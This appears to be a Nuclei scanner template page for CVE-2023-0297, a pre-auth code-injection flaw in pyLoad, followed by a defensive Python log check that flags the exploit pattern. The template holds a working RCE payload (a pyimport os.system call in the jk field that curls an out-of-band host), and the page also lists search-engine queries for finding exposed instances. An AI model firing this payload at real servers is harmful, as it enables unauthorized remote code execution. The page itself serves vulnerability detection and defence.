PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
ID: CVE-2023-0297
Severity: critical
Author: MrHarshvardhan,DhiyaneshDk
Tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast
Description
Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
YAML Source
id: CVE-2023-0297

info:
  name: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
  author: MrHarshvardhan,DhiyaneshDk
  severity: critical
  description: |
    Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the target system.
  remediation: |
    Upgrade PyLoad to a version that is not affected by this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/51532
    - https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1058
    - http://packetstormsecurity.com/files/171096/pyLoad-js2py-Python-Execution.html
    - http://packetstormsecurity.com/files/172914/PyLoad-0.5.0-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-0297
    cwe-id: CWE-94
    epss-score: 0.50964
    epss-percentile: 0.97545
    cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: pyload
    product: pyload
    shodan-query:
      - html:"pyload"
      - http.title:"login - pyload"
      - http.html:"pyload"
      - http.title:"pyload"
    fofa-query:
      - title="login - pyload"
      - body="pyload"
      - title="pyload"
    google-query:
      - intitle:"login - pyload"
      - intitle:"pyload"
    zoomeye-query: app="pyLoad"
  tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast

variables:
  cmd: "curl {{interactsh-url}}"

http:
  - raw:
      - |
        GET /flash/addcrypted2 HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /flash/addcrypted2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'JDownloader'

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100ab9438231de722cb151967fb0f3efb75922ad710197ce1d7785485eec30ef7a502201ecbd69f76a800e22db3bfe20b627d359cfccf0abf11bcd85b7c3f7c71828bef:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability described above in a web application. Run it with the Nuclei scanner against the target URL; the first request confirms the Click'N'Load endpoint is exposed (the response mentions JDownloader) and the second checks whether the injected command reaches the out-of-band interactsh host.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-0297.yaml"
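The template above flags a host by observing the out-of-band callback. On the defensive side, the same request shape can be spotted in traffic: the vulnerable Click'N'Load endpoint is /flash/addcrypted2, and the js2py `pyimport` bridge inside the `jk` field is what turns a JavaScript evaluation into Python execution (CWE-94). The following Python check is an added example, not part of the Nuclei template or the pyLoad project; the request records are constructed samples and the function names are assumptions. It could be run over request logs or in a WAF hook to raise an alert on exploitation attempts against unpatched instances.

```python
"""Flag HTTP requests that match the CVE-2023-0297 exploitation pattern.

Added example, not part of the Nuclei template or of pyLoad itself.
The check is deliberately narrow: POST to /flash/addcrypted2 whose `jk`
form field contains js2py's `pyimport` statement, which is the bridge
from the JavaScript sandbox into the Python interpreter.
"""
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample request records: (method, path, url-encoded form body).
# Record 2 follows the template's payload shape with a harmless command.
SAMPLE_REQUESTS = [
    ("GET", "/flash/addcrypted2", ""),
    ("POST", "/flash/addcrypted2",
     "jk=function+f%28%29%7Breturn+%27key%27%3B%7D&packages=foo&crypted=bar&passwords=baz"),
    ("POST", "/flash/addcrypted2",
     "jk=pyimport+os%3Bos.system%28%22echo+probe%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B"
     "&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw"),
    ("POST", "/login", "username=admin&password=secret"),
]

# js2py's non-standard `pyimport` statement is the only way a script
# handed to the Click'N'Load endpoint can reach Python modules.
_PY_BRIDGE = re.compile(r"\bpyimport\b", re.IGNORECASE)

# Paths are compared with a trailing slash stripped so "/flash/addcrypted2/"
# is treated the same as "/flash/addcrypted2".
VULNERABLE_PATH = "/flash/addcrypted2"


def is_cnl_exploit_attempt(method: str, path: str, body: str) -> bool:
    """Return True when the request targets the Click'N'Load endpoint with a
    `jk` field that carries a js2py Python bridge."""
    if method.upper() != "POST":
        return False
    if path.rstrip("/") != VULNERABLE_PATH:
        return False
    fields = parse_qs(body, keep_blank_values=True)
    for jk in fields.get("jk", []):
        # parse_qs already url-decodes once; decode a second time so a
        # double-encoded payload meant to dodge naive filters is still seen.
        if _PY_BRIDGE.search(jk) or _PY_BRIDGE.search(unquote_plus(jk)):
            return True
    return False


def scan_requests(records):
    """Return the indices of records that look like exploitation attempts."""
    return [i for i, (m, p, b) in enumerate(records)
            if is_cnl_exploit_attempt(m, p, b)]


if __name__ == "__main__":
    for idx in scan_requests(SAMPLE_REQUESTS):
        method, path, body = SAMPLE_REQUESTS[idx]
        jk = parse_qs(body).get("jk", [""])[0]
        print(f"ALERT record {idx}: {method} {path} jk={jk[:40]!r}")
```

The first template request (a plain GET to the endpoint) is not flagged: it is a normal probe for the Click'N'Load service and carries no `jk` field. A legitimate Click'N'Load client sends a `jk` value that is ordinary JavaScript defining a key function, as in record 1, so keying the alert on `pyimport` rather than on the endpoint alone keeps false positives low. Upgrading pyLoad past 0.5.0b3.dev31 remains the actual fix; the check only gives visibility while that is pending.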